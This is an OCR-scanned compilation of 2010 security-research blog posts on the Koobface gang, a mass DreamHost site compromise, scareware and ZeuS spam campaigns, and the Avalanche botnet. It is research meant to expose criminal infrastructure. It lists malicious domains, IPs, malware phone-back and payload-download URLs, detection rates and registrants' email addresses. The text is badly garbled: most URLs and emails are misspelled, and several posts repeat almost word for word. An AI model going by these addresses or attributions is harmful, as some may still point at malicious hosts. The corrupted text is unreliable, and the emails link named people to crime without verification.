parked on the same IP 109.196.143.56: zettapetta.com - 

109.196.143.56, A539150, VLTELECOM-AS VLineTelecom 
LLC Moscow, Russia - Email: 


hi- 


\arykneber@yahoo. com 

yahoo-statistic.com - Email: hiiarykneber@yahoo.com 
primusdns.ru - Email: samm _87@email.com 


freehost21.tw - Email: hilarykneber@yahoo.com 

alert35.com.tw - Email: admin@zaiert35.com.tw 

indesignstudioinfo.com - Email: 
hilarykneber@yahoo. com 

Historically, the following domains were also parked on the 
same IP 109.196.143.56: 

bananajuice21.net - Email: hilarykneber@yahoo.com 

winrar392.net - Email: Iacyjerryl958@gmail.com 

best-soft-free.com - Email: Iacyjerryl958@gmail.com 

setyupdate.com - Email: admin@setyupdate.com 

Detection rate for the scareware pushed in the campaign: 

- packupdatebuildl07 2060.exe - [3]TR0j 
FRAUD.SMDV; Packed.Win32.Krap.an - Result: 8/41 (19.52 
%) with the sample phoning back to: 

update2.keep-insafety.net - 94.228.209.221 - Email: 
gkook@checkjemail. nl 

updatel.myownguardian.com - 74.118.194.78 - Email: 
gkook@checkjemail. nl 

securel.saefty-guardian.com - 94.228.220.112 - Email: 
gkook@checkjemail. nl 

report.zoneguardland.net - 91.207.192.25 - Email: 
gkook@checkjemail. nl 

report.land-protection.com - 91.207.192.24 - Email: 
gkook@checkjemail. nl 



www5.our-security-engine.net - 94.228.220.111 - Email: 
gkook@checkjemail. nl 

reportl.stat-mx.xorg.pl 

updatel.securepro.xorg.pl 

Name servers of notice parked at 91.188.59.98, AS6851, 
BKCNET "SIA " IZZI: 

nsl. oklahomacitycom. com 

ns2. oklahomacitycom. com 

What's so special about [4JAS6851, BKCNET "SIA " IZZI 
anyway? It's the Koobface gang connection in the face of 
urodinam.net, which is also hosted within AS6851, 
currently responding to 91.188.59.10. More details on 

urodinam.net: 

• [5]Koobface Botnet's Scareware Business Model 

• [6]Koobface Botnet's Scareware Business Model - 
Part Two 

Moreover, on the exact same IP where Koobface gang's 
urodinam.net is parked, we also have the currently 

active Izabslwvn538n4i5tcjl.com - Email: 
michaeltycoon@gmail.com, serving client side exploits 
using the Yes Malware Exploitation kit - 91.188.59.10 
/temp/cache/PDF.php; admin panel at: 

Izabslwvn538n4i5tcjl. com 

/temp/admin/index.php 
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Detection rates for the malware pushed from the same IP 
where a key Koobface botnet's C &C is hosted: 

- 55.pdf - [7]J5:Pdfka-gen; Exploit.J5.Pdfka.blf- Result: 

23/41 (56.1 %) 

- dm.exe - [8]Trojan:Win32/Alureon.CT; Mal/TDSSPack-Q - 
Result: 36/41 (87.81 %) 

- wsc.exe - [9]Net-Worm. Win32.Koobface; Trojan.FakeAV - 
Result: 36/41 (87.81 %) 

The same michaeltycoon@gmail.com used to register 
Izabsiwvn538n4i5tcji.com , was also profiled in the 

"[lOJDiverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang" 

assessment. 

Given that enough historical 051 NT is available, the 
cybercrime ecosystem can be a pretty small place. 

Related posts: 

[11JU.S. Treasury Site Compromise Linked to the 
NetworkSolutions Mass Word Press Blogs Compromise 

[12] GoDaddy's Mass Word Press Blogs Compromise Serving 
Sea re ware 

[13] Dissecting the Word Press Blogs Compromise at Network 
Solutions 

Hilary Kneber related activity: 

[14] The Kneber botnet - FAQ 


[15] Celebrity-Themed Scareware Campaign Abusing 
DocStoc 

[16] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[17] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 
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Dissecting the Mass DreamHost Sites Compromise 
(2010-05-11 22:19) 

Yet another [ 1 Jmass sites compromise is currently 
taking place , this time targeting DreamHost 
customers, courtesy of the same gang behind the U.5 
Treasury/GoDaddy/NetworkSoiutions mass compromise 
campaigns. 

What's particularly interesting about the campaign, is not 
just [2]the Hilary Kneber connection, but also, the fact 
that a key command and control domain part of the 
Koobface botnet, is residing within the same AS where the 

nameservers, and one of actual domains 
(kdjkfjskdfjlskdjf.com/kp.php - 91.188.59.98 - AS6851, 
BKCNET "SiA" IZZI) used in previous campaigns are. 

These gangs are either aware of one another's existence, 
are the exact same gang doing basic evasive prac¬ 
tices on multiple fronts, or are basically customers of the 
same cybercrime-friendly hosting service provider. 
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The DreamHost campaign structure, including the detection 
rates, phone back locations, is as follows: 

- zettapetta.com/js.php -109.196.143.56 - Email: 
hilarykneber@yahoo. com 

- www4.suitcase52td.net/?p= - 78.46.218.249 - Email: 
gkook@checkjemaU. nl 

- wwwl.realsafe-23.net - 209.212.149.17 - Email: 
gkook@checkjemail. nl 
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Active client-side exploits serving, redirector domains 
parked on the same IP 109.196.143.56: zettapetta.com - 

109.196.143.56, A539150, VLTELECOM-AS VLineTelecom 
LLC Moscow, Russia - Email: 


hi- 


larykneber@yahoo. com 

yahoo-statistic.com - Email: hilarykneber@yahoo.com 

primusdns.ru - Email: samm _87@email.com 

freehost21.tw - Email: hilarykneber@yahoo.com 

aiert35.com.tw - Email: admin@zalert35.com.tw 

indesignstudioinfo.com - Email: 
hilarykneber@yahoo. com 


Historically, the following domains were also parked on the 
same IP 109.196.143.56: 

bananajuice21.net - Email: hilarykneber@yahoo.com 

winrar392.net - Email: Iacyjerryl958@gmail.com 

best-soft-free.com - Email: Iacyjerryl958@gmail.com 

setyupdate.com - Email: admin@setyupdate.com 

Detection rate for the scareware pushed in the campaign: 

- packupdate buildl07 2060.exe - [3]TR0j 
FRAUD.SMDV; Packed. Win32.Krap.an - Result: 8/41 (19.52 
%) with the sample phoning back to: 

update2.keep-insafety.net - 94.228.209.221 - Email: 
gkook@checkjemail. nl 

updatel.myownguardian.com - 74.118.194.78 - Email: 
gkook@checkjemail. nl 

securel.saefty-guardian.com - 94.228.220.112 - Email: 
gkook@checkjemail. nl 

report.zoneguardland.net - 91.207.192.25 - Email: 
gkook@checkjemaU. nl 

report.land-protection.com - 91.207.192.24 - Email: 
gkook@checkjemaU. nl 

www5.our-security-engine.net - 94.228.220.111 - Email: 
gkook@checkjemail. nl 

reportl.stat-mx.xorg.pl 

updatel.securepro.xorg.pl 



Name servers of notice parked at 91.188.59.98, A56851, 
BKCNET "51A" IZZI: 

nsl. oklahomacitycom. com 

ns2.oklahomacitycom.com 

What's so special about [4JAS6851, BKCNET "SIA " IZZI 
anyway? It's the Koobface gang connection in the face of 
urodinam.net, which is also hosted within A56851, 
currently responding to 91.188.59.10. More details on 

urodinam.net: 

• [5]Koobface Botnet's Scareware Business Model 

• [ 6 ] Koobface Botnet's Scareware Business Model - 
Part Two 

Moreover, on the exact same IP where Koobface gang's 
urodinam.net is parked, we also have the currently 

active Izabslwvn538n4i5tcjl.com - Email: 
michaeltycoon@gmail.com, serving client side exploits 
using the Yes Malware Exploitation kit - 91.188.59.10 
/temp/cache/PDF.php; admin panel at: 

Izabslwvn538n4i5tcjl. com 

/temp/admin/index.php 
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Detection rates for the malware pushed from the same IP 
where a key Koobface botnet's C &C is hosted: 

- 55.pdf - [7]J5:Pdfka-gen; Exploit.J5.Pdfka.blf- Result: 
23/41 (56.1 %) 


- dm.exe - [8]Trojan:Win32/Alureon.CT; Mal/TDSSPack-Q - 
Result: 36/41 (87.81 %) 

- wsc.exe - [9]Net-Worm. Win32.Koobface; Trojan.FakeAV - 
Result: 36/41 (87.81 %) 

The same michaeltycoon@gmail.com used to register 
Izabsiwvn538n4i5tcji.com, was also profiled in the 

"[lOjDiverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobf ace Gang" 

assessment. 

Given that enough historical OS I NT is available, the 
cybercrime ecosystem can be a pretty small place. 

Related posts: 

[11JU.S. Treasury Site Compromise Linked to the 
NetworkSolutions Mass WordPress Blogs Compromise 

[12] GoDaddy's Mass WordPress Blogs Compromise Serving 
Sea re ware 

[13] Dissecting the WordPress Blogs Compromise at Network 
Solutions 

Hilary Kneber related activity: 

[14] The Kneber botnet - FAQ 

[15] Celebrity-Themed Scareware Campaign Abusing 
DocStoc 

[16] Dissecting an Ongoing Money Mule Recruitment 
Campaign 



[17]Keeping Money Mule Recruiters on a Short Leash - Part 
Four 
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Spamvertised iTunes Gift Certificates and CV Themed 
Malware Campaigns (2010-05-13 20:16) 

What do the recently spamvertised [l]"Thank you for 
buying iTunes Gift Certificate!" and the "Look at my 
CV!" ' 

themed malware campaigns have in common? 

It's the fact that they've been launched by the same 
individual/gang. What's particularly interesting about the 

campaign, is that it's retying on a currently compromised 
web server, with a publicly accessible [2JPHP based 

backdoor. This exact [3]same approach is also used by 
the Koobface gang on a large scale, in order to efficiently 

[4]control the compromised sites involved in their 
Facebook spreading campaigns. 

Moreover, upon successful infection the campaign is not 
just pushing sea re ware, but evidence based on the 

binaries found within the directory indicate a ZeuS 
crimeware binary has been in circulation for a while. Let's 
dissect the campaign, and establish the obvious connection. 

Detection rates, phone back locations 

- iTunes certificate _497.exe - 

[5JTrojanDropper: Win32/0ficla. G - Result: 39/41 (95.12 %) 



Upon execution phones back to: 

- davidopolko.ru/migel/ bb.php?v=200 
&id=554905388 &b=6may &tm=3 

- jaazle.com/wp-includes 
/js/tinymce/themes/advanced/psihi.exe 

- phishi.exe - [6]Gen:Trojan.HeurTP.bmX@bins2Eb; 
Backdoor. Win32. Protector.ao - Result: 24/41 (58.54 %) 
ultimately dropping sea re ware on the infected host. 

Both campaigns are related, since the use the same 
command and control server , which is periodically up¬ 
dated with new URLs consisting of compromised sites. The 
detection rates, phone back locations for the second 

campaign are as follows: 
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- My Resume _218.exe - [7]W32/Ofic\a.O; 
Gen:Variant.Bredo.4 - Result: 17/41 (41.46 %) 

Upon executing the same phones back to the following 
URLs, in an attempt to drop the related binaries: 


da vidopoiko. ru/migel/bb.php ?v=200 

Seid =636608811 

&b=12may 


&tm=2 


195.78.108.201 


Email: 

vadim. rinatovich@yandex. ru 

- topcarmitsubishi. com.br /_ vti _ bin/ _ vti 
adm/psi.exe -201.76.146.215 

- davidopolko.ru 7psi.exe; davidopolko.ru 
7setupse2010. exe 

topcarmitsubishi.com.br appears to be a compromised 
site, with an open directory allowing the easier obtaining of 
the rest of the binaries used by the same gang/individual. 

Detection rates for the binaries within the open directory, 
including the dropped sea re ware: 

- psi.exe - [8]Trojan Down loader: Win32/Cutwail. gen.'C; 
Backdoor.Win32.Protector.at- Result: 17/41 (41.47 %) 

-sofgold.exe - [9]Trojan.Fakealert.14822; W32/Junkcomp.A 

- Result: 15/41 (36.59 %) 

- sp.exe - [10]PWS:Win32/Zbot.gen!R; a variant of 
Win32/Kryptik.EGZ - Result: 5/41 (12.2%) 

- ustest.exe - [ll]Net-Worm. Win32.Kolab - Result: 4/41 
(9.76 %) 



- firewall.dll - [12]Trojan:Win32/Fakeinit; 
Win32/TrojanDownloader.FakeAlert.A5l - Result: 20/40 (50 
%) 

- SetupSE2010.exe - [13]W32/FakeAV.AM!genr; 
CoreGuardAntivirus2009 - Result: 29/41 (70.74 %) 
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Phone back locations, C &Cs of the 4 samples: 

[14Jmystaticdatas.ru/basel/ess.cfg -195.88.144.63, 
A548984, 

VLAF-AS Vlaf Processing Ltd - Email: 

mail2businessman@gmail.com - [15]same email has 
been profiled before 

get-money-now. net/loads.php ? 

code=000000000048170 - 91.188.59.211, [16JAS6851, 
BKCNET "SiA" iZZi - Email: noxim@maidsf.ru 

get-money-now.net/ firewall.dll 

get-money-now. net/cgi-bin/ware. cgi? 
adv=000000000048170 

mamapapalol.com/cgi-bin/get.pi? 

1=000000000048170 - 88.80.4.19, A533837, PRQ-A5 - 
Email: 


secu- 


rity2guard@gmail. com 


SGTSRX.jackpotmsk.ru - FAST FLUX - Email: 
alskudrya v@yandex. ru 

JETIHB.piterfml.ru - FAST FLUX - Email: 
alskudrya v@yandex. ru 

UDUMOM.bingoforus.ru - FAST FLUX - Email: 
alskudrya v@yandex. ru 

ZMOWOE.rusradiol.ru - FAST FLUX - Email: 
alskudrya v@yandex. ru 

funnylive2010.ru - domain part of the fast flux 
infrastructure - Email: kurk@sovbiz.net 

wapdodoit.ru - domain part of the fast flux infrastructure - 
Email: sharan812@yandex.ru 
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Related domains parked on 88.80.4.19 

(mamapapalol. com/cgi-bin/get.pl? 
1=000000000048170): 

buy-is2010.com - Email: vasya@mail.ru 

buy-security-essentials.com - Email: noxim@maidsf.ru 
for-sunny-se.com - Email: noxim@maidsf.ru 

for-sunny-smile.com - Email: vasya@mail.ru 
mega-scan-pc-newl4.com - Email: noxim@maidsf.ru 


red-xxx-tube.net - Email: noxim@maidsf.ru 
sunny-moneyl.com - Email: noxim@maidsf.ru 
winter-smile.com - Email: vasya@maii.ru 

megahostingl 0. com 

Updated will be posted, as soon as they switch to a new 
theme, introduce new monetization tactics. 

This post has been reproduced from [17]Dancho 
Danchev's blog. Follow him [18]on Twitter. 
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htto://www. virustotal. com/analisis/306d49c93al9585487el 

aefd4018f5cca2f94c5acd83410ac84370b4delbc4d6-12736 





















74668 


12. httoV/www. virustotal. com/reanaIisis.htmI? 
e83ffb0315226e5192e824 7f859ad7abf3914d858f6dd2dhd8 

C7da97815ff0a 

2-1273675323 

13. 

http://www.virustotal.com/analisis/85272f56d400d8d56ee54 

74f7fl6f63ec0f571e696feeb4be286938259f41ada-12736 

75693 

14. httDs://zeustracker.abuse, ch/monitor. oho? 
host=m vstaticdatas. ru 

15. htto.V/ddanchev. blo as oot. com/2009/12/ceiebrit v- 
themed-scare ware-camoaian.html 

16. htto.V/ddanchev. blo as oot. com/2010/05/dissectina-mass- 
dreamhost-sites.html 

17. htto.V/ddanchev. blo as oot. com/ 

18. htto://twitter, com/danchodanchev 
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The Avalanche Botnet and the TROYAK-AS Connection 
(2010-05-13 22:14) 

According to the latest [1JAPWG Global Phishing Survey: 

• But by mid-2009, phishing was dominated by one player 
as never before the Avalanche phishing operation. This 
























criminal entity is one of the most sophisticated and 
damaging on the Internet, and perfected a mass-production 

system for deploying phishing sites and "crimeware" - 
malware designed specifically to automate identity theft 
and facilitate unauthorized transactions from consumer 
bank accounts. Avalanche was responsible for two-thirds 
(66 %) of all phishing attacks launched in the second half of 
2009, and was responsible for the overall 

increase in phishing attacks recorded across the Internet." 

The [2]Avalanche botnet's ecosystem is described by 
PhishLabs as: 

• "[3]Cutwaii aka Push Do is a spamming trojan being 
used to send out [4]massive amounts of spam with 
links (or lures) to phishing pages or pages that ask the 
users to download and run programs. Those programs 
invariably turn out to be instances of the 
[5]Zeus/ZBot/WNSPOEM banking Trojan. There are also 
unrelated criminals 

that also use Zeus Trojans to steal online banking 
information that are not related to this set of scams. 

The Avalanche botnet is the middle-step between the 
spamming botnet and Trojans that steal banking informa¬ 
tion. It is basically a hosting platform used by the attackers. 
Because the Avalanche bots act as a simple proxy, and 
there are thousands of them, it has been exceedingly 
difficult to shutdown the phish pages. Instead most 

Anti-Phishing organizations have focused on shutting down 
the domain names that were used in the phishing 



URLs." 
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One of the most notable facts about the botnet, is their 
persistent interaction with the [6JTROYAK-AS cybercrime- 
friendly ISP, where they used to host a huge percentage of 
their ZeuS C &Cs, next to the actual client-side exploit 
serving iFra me domains/IPs, found on each and every of 
their phishing pages. The following chronology, exclusively 
details their client-side exploits/ZeuS crime ware serving 
campaigns. 

The Avalanche Botnet's ZeuS crimeware/client-side 
exploit serving campaigns, in chronological order: 

[7] Zeus Crimeware/Client-Side Exploits Serving Campaign in 
the Wild 

[8] Scareware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild 

[9] lRS/PhotoArchive Themed Zeus/Client-Side Exploits 
Serving Campaign in the Wild 

[lOJTax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[11] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Facebook/AOL Update Tool Spam Campaign Serving 
Crime ware and Client-Side Exploits 

[13] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 



[14] Out\ook Web Access Themed Spam Campaign Serves 
Zeus Crime ware 

[15] Pushdo Injecting Bogus Swine Flu Vaccine 

[16] "Your mailbox has been deactivated" Spam Campaign 
Serving Crime ware 

[17] Ongoing FD/C Spam Campaign Serves Zeus Crimeware 

[18] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

Related articles on TROYAK-AS, and various 
cybercrime trends: 

[19JTR0YAK-AS: the cybercrime-friendly ISP that just won't 
go away 

[20] AS-Troyak Exposes a Large Cybercrime Infrastructure 

[21] The current state of the crimeware threat - Q &A 

[22] Report: ZeuS crimeware kit, malicious PDFs drive 
growth of cybercrime 

[23] Report: Malicious PDF files comprised 80 percent of all 
exploits for 2009 

This post has been reproduced from [24]Dancho 
Danchev's blog. Follow him [25]on Twitter. 

1 . 

http://www.antiphishing. ora/reports/APWG_ GlobalPhishinaSu 
rvev 2H2009. pdf 


2. http://www. phishlabs, com/blo a/ 









3. httoV/www.zdnet.com/bloa/securitv/cutwail-botnet- 
s oammina-irs-unreoorted-income-themed-malwa re/4260 

4. 

htto://us. trendmicro.com/imoeria/md/content/us/Ddf/threat5/ 
securitvlibrarv/studv_ of push do. odf 

5. http://www.secureworks.com/research/threats/zeus/? 
threat=zeus 

6. htto.V/ddanchev.blo as oot.com/2010/03/as50215-trovak- 
as-taken-offline-zeus-c. html 

7. htto://ddanchev.blo as oot. com/2010/03/zeus- 
crimewareclient-side-exoloits.html 

8. htto://ddanchev.blo as oot. com/2010/03/scareware- 
sinowal-client-side-exoloits.html 

9. htto.V/ddanchev.blo as oot. com/2010/02/irsohotoarchive- 
th emed-ze usdsent-side, h tm / 

10. htto.V/ddanchev. blo as oot. com/2010/02/tax-reoort- 
th emed-ze usclien t-side. h tm I 

11. htto://ddanchev. blo as oot. com/2010/02/ohotoarchive- 
cnmewareciient-side.html 

12. htto.V/ddanchev.blo as oot. com/2010/01/facebookaol- 
u Ddate-tool-SDam-camoaian.html 

13. htto.V/ddanchev. blo as oot. com/2010/01/oushdo-servin a- 
crimewa re-client-side, html 

14. htto.V/ddanchev. blo as oot. com/2010/01/outlook-web- 
access-themed-soam-camoaian.html 























































15. htto.V/ddanchev. blo as oot. com/2009/12/oushdo- 
in iectina-boaus-swine-flu.html 


16. htto.V/ddanchev. blo as oot. com/2009/11/vour-mailbox- 
has-been-deactivated-soam.html 

17. htto.V/ddanche i/. blo as oot. com/2009/1O/onooino-fdic- 
s oam-camoaian-serves-zeus. html 

18. htto.V/ddanche v. blo as oot. com/2009/07/m u Id taskin g- 
fast-flux-botnet-that.html 

19. httoV/www.zdnet.com/bloa/securitv/trovak-as-the- 
c vbercrime-friendlv-isD-that-iust-wont-ao-a wa v/5761 

20. httD.V/rsa.com/bloa/bloa entry.asox?id=1610 

21. http://www.zdnet, com/bloa/securitv/the-current-state-of- 
the-crimeware-threat-a-a/5 797 

22. htto.V/www.zdnet.com/bloa/securitv/reoort-zeus- 
crimeware-kit-malicious-odfs-drive-arowth-of-cvbercrime/62 
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23. 

httDV/www.zdnet.com/bloa/securitv/reoort-malidous-Ddf- 

files-comorised-80-Dercent-of-aH-exDloits-for- 

2009/5473 

24. htto.V/ddanchev. blo as oot. com/ 

25. htto://twitter, com/danchodanchev 
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The Avalanche Botnet and the TROYAK-AS Connection 
( 2010 - 05-13 22 : 14 ) 

According to the latest [ljAPWG Global Phishing Survey: 

• But by mid-2009, phishing was dominated by one player 
as never before the Avalanche phishing operation. This 

criminal entity is one of the most sophisticated and 
damaging on the Internet, and perfected a mass-production 

system for deploying phishing sites and "crimeware" - 
malware designed specifically to automate identity theft 
and facilitate unauthorized transactions from consumer 
bank accounts. Avalanche was responsible for two-thirds 
(66 %) of all phishing attacks launched in the second half of 
2009, and was responsible for the overall 

increase in phishing attacks recorded across the Internet." 

The [2]Avalanche botnet's ecosystem is described by 
PhishLabs as: 

• "[3]Cutwail aka Push Do is a spamming trojan being 
used to send out [4]massive amounts of spam with 
links (or lures) to phishing pages or pages that ask the 
users to download and run programs. Those programs 
invariably turn out to be instances of the 
[5]Zeus/ZBot/WNSPOEM banking Trojan. There are also 
unrelated criminals 

that also use Zeus Trojans to steal online banking 
information that are not related to this set of scams. 


The Avalanche botnet is the middle-step between the 
spamming botnet and Trojans that steal banking informa¬ 
tion. it is basically a hosting platform used by the attackers. 
Because the Avalanche bots act as a simple proxy, and 
there are thousands of them, it has been exceedingly 
difficult to shutdown the phish pages. Instead most 

Anti-Phishing organizations have focused on shutting down 
the domain names that were used in the phishing 

URLs." 
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One of the most notable facts about the botnet, is their 
persistent interaction with the [6JTROYAK-AS cybercrime- 
friendly ISP, where they used to host a huge percentage of 
their ZeuS C &Cs, next to the actual client-side exploit 
serving i Fra me domains/IPs, found on each and every of 
their phishing pages. The following chronology, exclusively 
details their client-side exploits/ZeuS crime ware serving 
campaigns. 

The Avalanche Botnet's ZeuS crimeware/ciient-side 
exploit serving campaigns, in chronological order: 

[7] Zeus Crimeware/Client-Side Exploits Serving Campaign in 
the Wild 

[8] Scareware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild 

[9] lRS/PhotoArchive Themed Zeus/Client-Side Exploits 
Serving Campaign in the Wild 



[lOjTax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[11 JPhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[12] Facebook/AOL Update Tool Spam Campaign Serving 
Crime ware and Client-Side Exploits 

[13] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[14] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[15] Pushdo Injecting Bogus Swine Flu Vaccine 

[16] "Your mailbox has been deactivated" Spam Campaign 
Serving Crimeware 

[17] Ongoing FDIC Spam Campaign Serves Zeus Crimeware 

[18] The Multitasking Fast-Flux Botnet that Wants to Bank 
With You 

Related articles on TROYAK-AS, and various 
cybercrime trends: 

[19JTR0YAK-AS: the cybercrime-friendly ISP that just won't 
go away 

[20] AS-Troyak Exposes a Large Cybercrime Infrastructure 

[21] The current state of the crimeware threat - Q &A 

[22] Report: ZeuS crimeware kit, malicious PDFs drive 
growth of cybercrime 



[23]Report: Malicious PDF files comprised 80 percent of all 
exploits for 2009 

This post has been reproduced from [24]Dancho 
Danchev's blog. Follow him [25]on Twitter. 

1 . 

htto://www.antiohishina. ora/reoorts/APWG_ GlobalPhishinaSu 
rvev 2H2009. pdf 

2. htto://www. ohishlabs. com/blo a/ 

3. htto://www.zdnet.com/bloa/securitv/cutwail-botnet- 
S Dammina-irs-unreoorted-income-themed-malwa re/4260 

4. 

htto://us. trendmicro.com/imperia/md/content/us/Ddf/threats/ 
securitvlibrarv/studv_ of push do. odf 

5. http://www.secureworks.com/research/threats/zeus/? 
threat=zeus 

6. htto.V/ddanchev.blo as oot.com/2010/03/as50215-trovak- 
as-taken-offline-zeus-c.html 

7. htto://ddanchev.blo as oot.com/2010/03/zeus- 
crimewareclient-side-exDloits.html 

8. http://ddanchev.blo as oot. com/2010/03/scareware- 
sinowal-client-side-exoloits.html 

9. htto.V/ddanchev.blo as oot.com/2010/02/irsohotoarchive- 
themed-zeusclient-side.html 

10. htto.V/ddanche v. blo as oot. com/2010/02/tax-re do rt- 
themed-zeusclient-side.html 











































11. htto.V/ddanchev. blo as oot. com/2010/02/ohotoarchive- 
crimewaredient-side. html 

12. htto.V/ddanchev.blo as oot. com/2010/01/facebookaol- 
u Ddate-tool-SDam-camoaian.html 

13. htto.V/ddanchev. blo as oot. com/2010/01/oushdo-servin a- 
crimeware-client-side.html 

14. htto.V/ddanchev. blo as oot. com/2010/01/outlook-web- 
access-themed-soam-camoaian.html 

15. htto.V/ddanchev. blo as oot. com/2009/12/oushdo- 
in iectina-boaus-swine-flu.html 

16. htto.V/ddanchev. blo as oot. com/2009/11/vour-mailbox- 
has-been-deactivated-soam.html 

17. htto.V/ddanche i/. blo as oot. com/2009/10/onaoina-fdic- 
s oam-camoaian-serves-zeus. html 

18. htto.V/ddanche v. blo as oot. com/2009/07/m ultitaskin a- 
fast-flux-botnet-that.html 

19. htto.V/www.zdnet.com/bloa/securitv/trovak-as-the- 
c vbercrime-friendlv-iso-that-iust-wont-ao-a wa v/5761 

20. httD.V/rsa.com/bloa/bloa entry.asox?id=1610 

21. http://www.zdnet, com/bloa/securitv/the-current-state-of- 
the-crimeware-threat-a-a/5 797 

22. htto.V/www.zdnet.com/bloa/securitv/reoort-zeus- 
crimeware-kit-malicious-odfs-drive-arowth-of-cvbercrime/62 
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httD://www.zdnetcom/bloa/securitv/reDort-malicious-Ddf- 

files-comDrised-80-Dercent-of-all-exDloits-for- 

2009/5473 
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Koobface Gang Responds to the "10 Things You 
Didn't Know About the Koobface Gang Post" 

(2010-05-17 21:23) 

UPDATED Moday, May 24, 2010: The sea re ware 
domains/redirectors pushed by the Koobface botnet, have 
been 

included at the bottom of this post, including detection 
rates and phone back URLs. 

On May 13th, 2010, the Koobface gang responded to my " 

[1]10 things you didn't know about the Koobface 

gang " post published in February, 2010, by including the 
following message within Koobface-infected hosts, serving 
bogus video players, and, of course, sea re ware: 

• regarding this [2]article By Dancho Danchev / February 
23, 2010, 9:30am PST 














1. no connection 2 . what's reason to buy software just for 
one screenshot? 3. no connection 4. :) 5. :) 6. :) 7. 

it was 'aii baba & 4' originally, you should be more careful 
8. heh 9. strange error there're no experiments on that 10. 
maybe, not 100 % sure 

Aii Baba 13 may 2010 

This is the [3]second individual message left by the 
botnet masters for me, and the third one in general 
where I'm referenced. 

What makes an impression is their/his attempt to distance 
themselves/himself from major campaigns affect¬ 
ing high profile U.S based web properties, fraudulent 
activities such as dick fraud, and their/his attempt to 
legitimize their/his malicious activities by emphasizing on 
the fact that they/he are not involved in crimeware 
campaigns, and have never stolen any credit card details. 

01. [4]The gang is connected to, probably 
maintaining the dick-fraud facilitating Bahama 
botnet 

- Koobface gang: no connection 
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You wish, you wish. [5]ClickForensics pointed it out, [6]l 
confirmed it, and at a later stage reproduced it. 

Among the many examples of this activities, is MD5: 

Ofbfla9f8e6e305138151440da58b4fl modifying the 


HOSTS file on the infected PCs to [7]redirect all the 
Google and Yahoo search traffic to 89.149.210.109, 
whereas, in [8]between phoning back to well known 

[9]Koobface sea reware C &Cs at the time, such as 
212.117.160.18, and urodinam .net/8732489273.php at 

the time. 

In May, 2010, parked on the very same IP to which 
urodinam.net (91.188.59.10) is currently responding to, 
is an active [10]client-side exploits serving campaign 
using the YES malware exploitation kit 

(Izabslwvn538n4i5tcjl.com - 

Email: michaeltycoon@gmail. com). 

/ can go on forever. 

02. [llJDespite their steady revenue flow from sales 
of scareware, the gang once used trial software to 
take a screenshot of a YouTube video 

- Koobface gang: what's reason to buy software just for one 
screenshot? 
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No reason at all, I guess that's also the reason behind the 
temporary change in [12]scareware URIs to include 
GREED within the file name. 

03. [13]The Koobface gang was behind the 
malvertising attack the hit the web site of the New 
York Times 

in September 

- Koobface gang: no connection 



You wish, you wish. 

In fact, several of the recent high-profile malvertising 
campaigns that targeted major Web 2.0 properties, can 

be also traced back to their infrastructure. Now, whether 
they are aware of the true impact of the malvertisement 
campaign, and whether they are intentionally pushing it at 
a particular web site remains unknown. 

The fact is that, the exact [14]same domain that was 
used in the NYTimes redirection, was also back then 

embedded on all of the Koobface infected hosts, in 

order to serve sea re ware. 


04. 


[15]The gang conducted a several hours experiment 
in November, 2009 when for the first time ever 

client-side exploits were embedded on Koobface¬ 
serving compromised hosts 

- Koobface gang::) 

He who smiles last, smiles best. 

05. [16]The Koobface gang was behind the massive 
(1+ million affected web sites) scareware serving 
cam¬ 
paign in November, 2009 

- Koobface gang::) 

Since they're admitting their involvement in point 5, they 
also don't know/forget that one of the many ways 



the [17]connection between the Koobface gang and 
massive blackhat SEO campaign was established in 
exactly the same way as the one in their involvement in the 
NYTimes malvertising campaign. Convenient denial of 
involvement 

in high-profile campaigns means nothing when collected 
data speaks for itself 

06. [18]The Koobface Gang Monetizes Mac OS X 
Traffic through adult dating/Russian online movie 
market¬ 
places 

- Koobface gang::) 

Read more on the practice - " [19] How the Koobface 
Gang Monetizes Mac OS X Traffic ". 
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07. [20JAH Baba and 40 LLC a.k.a the Koobface gang 
greeted the security community on Christmas 

- Koobface gang: it was 'ali baba & 4' originally you should 
be more careful 

Since the original [21 ]Ali Baba had 40 thieves with him, 

not 4, the remaining 36 can be best described as the 
cybee rime ecosystem's stakeholders earning revenues and 
having their business models scaling, thanks to the 

involvement of the Koobface botnet. 


08. [22]The Koobface gang once redirected 
Facebook's IP space to my personal blog 

- Koobface gang: heh 

Read more on the topic - " [23] Koobface Botnet 
Redirects Facebook's IP Space to my Blog ". 

09. [24]The gang is experimenting with alternative 
propagation strategies, such as for instance Skype 
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- Koobface gang: strange error, there're no experiments on 
that 

Hmm, who should I trust? [25]SophosLabs and 
[26]TrendMicro or the Koobface gang? SophosLabs and 
Trend Micro or the Koobface gang? Soph os Labs and 
Trend Micro or....well you get the point. Of course there isn't, 
now that's is publicly known it's in the works. 

10. [27]The gang is monetizing traffic through the 
Crusade Affiliates scareware network 

- Koobface gang: maybe, not 100 % sure 

They don't know where they get ail the money by being 
pushing scareware? How convenient. 

When data and facts talk, even "CyberJesus" listens. Read 
more on the monetization model - " [28]Koobface 
Botnet's Scareware Business Model " [29]Koobface 
Botnet's Scareware Business Model - Part Two ". 


The Koobface botnet is currently pushing sea re ware through 

2gig-antivirus.com?mid=312 &code=4dbl2f &d=l 

&s=2 -195.5.161.210 - Email: test@now.net.cn 
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Parked on the same IP (195.5.161.210, AS31252, 5TARN ET¬ 
AS StarNet Moldova) are also: 

Oweb-antispyware.com - Email: test@now.net.cn 

12netantispy.com - Email: test@now.net.cn 

13netantispy.com - Email: test@now.net.cn 

14netantispy.com - Email: test@now.net.cn 

16netantispy.com - Email: test@now.net.cn 

lanetantispy.com - Email: test@now.net.cn 

lbnetantispy.com - Email: test@now.net.cn 

